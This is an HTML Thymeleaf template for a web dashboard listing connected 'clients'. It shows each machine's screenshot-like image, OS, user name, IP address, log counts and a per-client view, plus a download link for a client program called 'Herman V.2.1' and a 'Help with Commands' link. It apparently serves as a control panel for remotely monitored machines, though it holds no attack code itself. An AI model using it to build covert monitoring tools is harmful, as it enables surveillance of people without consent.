<!DOCTYPE html>
<html lang="en" xmlns:th="http://www.thymeleaf.org">
<head>
    <meta charset="UTF-8"/>
    <title>Home</title>
    <link rel="stylesheet" href="../vorlage.css"/>
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"/>
</head>
<body>
<center>
    <div id="outer">
        <div id="inner">
            <h1>Home</h1>
            <hr/>
            <h3>Clients</h3>
            <br/>
            <div class="w3-row-padding">
                <div class="w3-col s4" style="margin-bottom: 20px" th:each="client : ${model}">
                    <div class="w3-card-4" style="width:100%">
                        <div style="cursor: default" class="w3-container w3-light-grey">
                            <h3 th:text="${client.nickname}"></h3>
                        </div>


                        <div th:switch="${client.img}">
                            <!--<span th:case="'none'"></span>-->
                            <img th:case="*" src="" th:src="'../dashboard/img/' + ${client.img}" style="width:100%"/>
                        </div>

                        <div class="w3-container">
                            <hr/>
                            <p th:text="${client.os}"></p>
                            <hr/>
                            <p th:text="${client.lastseen}"></p>
                            <hr/>
                        </div>
                        <a th:onClick="'javascript:more(\''+ ${client.client} +'\');'"
                           class="w3-button w3-block w3-white">
                            More ▼
                        </a>

                        <div th:id="${client.client}" class="w3-hide">
                            <div class="w3-container">
                                <table class="w3-table w3-bordered">
                                    <tr>
                                        <th>
                                            <b>User</b>
                                        </th>
                                        <td th:text="${client.pcuser}"></td>
                                    </tr>
                                    <tr>
                                        <th>
                                            <b>Ip</b>
                                        </th>
                                        <td th:text="${client.ip}"></td>
                                    </tr>
                                    <tr>
                                        <th>
                                            <b>Logs</b>
                                        </th>
                                        <td th:text="${client.logcount}"></td>
                                    </tr>
                                    <tr>
                                        <th>
                                            <b>Errors</b>
                                        </th>
                                        <td th:text="${client.errorcount}"></td>
                                    </tr>
                                    <tr>
                                        <th>
                                            <b>Arch</b>
                                        </th>
                                        <td th:text="${client.arch}"></td>
                                    </tr>
                                </table>
                            </div>


                            <!--<p th:text="'User: ' + ${client.pcuser}"></p>-->
                            <!--<p th:text="'Ip: ' + ${client.ip}"></p>-->
                            <!--<hr/>-->
                            <!--<p th:text="'Logs: ' + ${client.logcount}"></p>-->
                            <!--<p th:text="'Erros: ' + ${client.errorcount}"></p>-->
                            <!--<hr/>-->
                            <!--<p th:text="'Arch: ' + ${client.arch}"></p>-->
                        </div>
                        <a th:href="@{'/dashboard/' + ${client.client}}" class="w3-button w3-block w3-ripple w3-teal">
                            View
                        </a>
                    </div>
                </div>
            </div>
            <br/>

            <div class="w3-row-padding">
                <div class="w3-col s6">
                    <div class="w3-card-4 w3-container w3-light-grey">
                        <h3>Logged in as <span th:text="${user}"></span></h3>
                        <p>
                            <a class="input secondaryAction w3-card-4"
                               href="https://drive.google.com/open?id=1SP41Rzmq-VkwruaWoCADx9xBfkhl3bI6">
                                Download Herman V.2.1
                            </a>
                        </p>
                    </div>
                </div>
                <div class="w3-col s6">
                    <div class="w3-card-4 w3-container w3-light-grey">
                        <h3>Registrations</h3>
                        <ul class="w3-ul w3-card-4 w3-hoverable">
                            <li style="cursor: pointer" th:each="registration:${registrations}"
                                class="w3-display-container">
                                <a th:text="${registration.text}"></a>
                                <a class="w3-button w3-display-right w3-hover-red">&times;</a>
                            </li>
                        </ul>
                        <br/>
                        <form action="/register/create" th:method="post" method="post">
                            <div class="w3-row-padding">
                                <div class="w3-col s5">
                                    <input class="w3-input" name="user" type="text" placeholder="Username"/>
                                </div>
                                <div class="w3-col s5">
                                    <input class="w3-input" name="password" type="password" placeholder="Password"/>
                                </div>
                                <div class="w3-col s2">
                                    <input type="submit" value="Save" class="input secondaryAction w3-card-4"/>
                                </div>
                            </div>


                        </form>
                        <br/>
                    </div>
                </div>
            </div>
            <br/>
            <br/>
            <a href="dashboard/help" class="input secondaryAction w3-card-4">Help with Commands</a>
        </div>
    </div>
</center>
<script>
    function more(id) {
        var x = document.getElementById(id);
        if (x.className.indexOf("w3-show") == -1) {
            x.className += " w3-show";
        } else {
            x.className = x.className.replace(" w3-show", "");
        }
    }
</script>
<div style="position: fixed; bottom: 3px; right: 3px; padding: 3px; cursor:pointer;" class="w3-card-4">
    寒意
</div>
</body>
</html>
